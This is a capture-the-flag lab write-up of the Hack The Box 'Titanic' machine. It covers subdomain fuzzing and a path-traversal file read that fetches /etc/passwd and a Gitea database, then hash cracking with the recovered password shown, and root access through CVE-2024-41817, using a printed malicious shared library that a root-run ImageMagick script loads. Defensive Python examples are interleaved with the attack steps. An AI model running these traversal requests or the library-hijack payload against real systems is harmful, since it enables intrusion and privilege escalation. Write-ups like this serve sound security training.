Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 16 Feb 2025
IP: 10.10.11.55


⚙️ Enumeration & Initial Access

🔍 Nmap Scan

PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.52
  • 22 – SSH
  • 80 – Apache Web Server

The hostname titanic.htb was added to /etc/hosts.


🌐 Web Enumeration

The web application appears to be a ticket booking system with no immediately obvious vulnerabilities. I then enumerated subdomains using ffuf:

ffuf -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb" \
-w ../../wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fw 20

Found a valid subdomain:

dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 53ms]

📁 Gitea Source Leak

Navigating to http://dev.titanic.htb/ revealed an exposed Gitea instance containing the application's source code and Docker files.

htb-titanic-1.png

After analyzing the code, I identified a Local File Inclusion (LFI) vulnerability in the ticket download endpoint:

http://titanic.htb/download?ticket=

Confirmed by fetching /etc/passwd:

curl "http://titanic.htb/download?ticket=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
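As an added illustration of the defect behind this download endpoint (example code, not the application's own; it assumes a Python app and an assumed storage directory /opt/app/tickets), here is the naive join beside a version that refuses traversal:

```python
import os
from typing import Optional

# Added example, not the ticket application's own code. It models the `ticket` parameter of
# the /download endpoint: the user-supplied value ends up in a file path, and nothing stops
# "../" from walking out of the storage directory. TICKET_DIR is an assumed location.
TICKET_DIR = "/opt/app/tickets"


def naive_ticket_path(ticket: str, base: str = TICKET_DIR) -> str:
    """The shape of the bug: join the parameter onto the base and use the result as-is.
    Four "../" components climb from /opt/app/tickets to /, which is how the request
    ticket=../../../../etc/passwd came back with /etc/passwd."""
    return os.path.normpath(os.path.join(base, ticket))


def safe_ticket_path(ticket: str, base: str = TICKET_DIR) -> Optional[str]:
    """Return the path of a ticket file inside `base`, or None if the value is not a
    plain file name or would resolve outside the directory."""
    # Layer 1: a ticket is a single file name. No separators, no NUL, no dot entries.
    # Check the value exactly as it will be used: any URL decoding must happen before
    # this function, never after it, or an encoded slash slips through.
    if not ticket or ticket in (".", "..") or "\x00" in ticket:
        return None
    if "/" in ticket or "\\" in ticket:
        return None
    # Layer 2: canonicalise and prove the result is still under base. Redundant with
    # layer 1 today, but it survives a later decision to allow sub-folders.
    base = os.path.normpath(base)
    candidate = os.path.normpath(os.path.join(base, ticket))
    if os.path.commonpath([base, candidate]) != base:
        return None
    # normpath never touches the filesystem: if users can plant symlinks in the directory,
    # open the result with os.O_NOFOLLOW or realpath() it and repeat the commonpath check.
    return candidate
```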

🗃️ Gitea DB Extraction via LFI

Attempting to access the SSH private key for developer failed.

Knowing that Gitea's data directory lives under the developer user's home, I used the same traversal to download the Gitea database:

wget "http://titanic.htb/download?ticket=../../../../home/developer/gitea/data/gitea/gitea.db"

htb-titanic-2.png


🔓 User Access

To crack the Gitea hashes, I followed this guide:
🔗 unix-ninja: Cracking Gitea PBKDF2

sqlite3 gitea.db 'select salt,passwd from user;' | ./gitea2hashcat.py

Example output:

sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

Cracked using Hashcat:

hashcat gitea.hashes --show --user
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

Got the developer password: 25282528

SSH login was successful with those credentials:

ssh developer@titanic.htb

✅ Logged in successfully and obtained the user flag.

cat user.txt
7090417266c81a932256846xxxxxxxxxxx

🚀 Root Access

Discovered a script that identifies images using ImageMagick:

cat /opt/scripts/identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Metadata output:

cat metadata.log
/opt/app/static/assets/images/home.jpg JPEG 1024x1024 ...

ImageMagick version:

/usr/bin/magick --version
# ImageMagick 7.1.1-35

💥 CVE-2024-41817: ImageMagick RCE

This ImageMagick build is affected by CVE-2024-41817: the AppImage launcher could leave an empty entry in LD_LIBRARY_PATH and MAGICK_CONFIGURE_PATH, so shared libraries and config files in the current working directory get loaded, and the script above runs magick from a directory the developer user can write to. Reference:
🔗 CVE-2024-41817 Exploit Guide

🛠️ Exploitation Steps:

Compile a malicious shared library into the images directory the script works from:

cd /opt/app/static/assets/images

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cat /root/root.txt >> /tmp/root");
exit(0);
}
EOF

Waited for the scheduled image script to run, then verified the output:

developer@titanic:/opt/app/static/assets/images$ cat /tmp/root
24fdc646904035671dd5e3fxxxxxxxxx
developer@titanic:/opt/app/static/assets/images$

🎉 Got the root flag!
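As an added defensive counterpart to /opt/scripts/identify_images.sh (example code written here, not the box's script), this Python version does the same job without running magick from a user-writable directory and refuses directories that show the signs of the technique above; upgrading ImageMagick is the real fix, this limits what a scheduled job can be made to do in the meantime. Paths and the binary are the ones the page shows.

```python
import os
import stat
import subprocess
from typing import List, Optional

# Added example, not the box's /opt/scripts/identify_images.sh. With CVE-2024-41817 the
# ImageMagick AppImage could leave an empty entry in LD_LIBRARY_PATH / MAGICK_CONFIGURE_PATH,
# so libraries and XML config in the current directory were loaded; the original script cd's
# into a directory the developer user can write to, which is all the planted libxcb.so.1 needed.
MAGICK = "/usr/bin/magick"  # same binary the box's script calls


def check_image_dir(mode: int, names: List[str]) -> Optional[str]:
    """Pure policy check on a directory's st_mode and its entry names; None means OK."""
    if not stat.S_ISDIR(mode):
        return "not a directory"
    # Group- or world-writable is how a non-root user got to drop files next to the images.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "directory is group- or world-writable"
    for name in names:
        # libfoo.so, libfoo.so.1 and stray ImageMagick config such as delegates.xml/policy.xml
        if name.endswith((".so", ".xml")) or ".so." in name:
            return f"unexpected file next to images: {name}"
    return None


def identify_images(image_dir: str, log_path: str) -> List[str]:
    """Append `magick identify` output for every .jpg under image_dir to log_path."""
    try:
        reason = check_image_dir(os.stat(image_dir).st_mode, os.listdir(image_dir))
    except OSError as exc:
        reason = f"cannot inspect {image_dir}: {exc}"
    if reason:
        raise RuntimeError(f"refusing to run ImageMagick: {reason}")
    jpgs = sorted(os.path.join(root, f) for root, _, files in os.walk(image_dir)
                  for f in files if f.endswith(".jpg"))
    open(log_path, "w").close()  # truncate first, like the original `truncate -s 0`
    if not jpgs:
        return []
    # cwd="/" plus a minimal environment: an empty LD_LIBRARY_PATH entry now means "/", not
    # the image directory, and no inherited MAGICK_* variable can redirect config loading.
    proc = subprocess.run([MAGICK, "identify", *jpgs], cwd="/", env={"PATH": "/usr/bin:/bin"},
                          capture_output=True, text=True, check=True)
    with open(log_path, "a") as log:
        log.write(proc.stdout)
    return proc.stdout.splitlines()
```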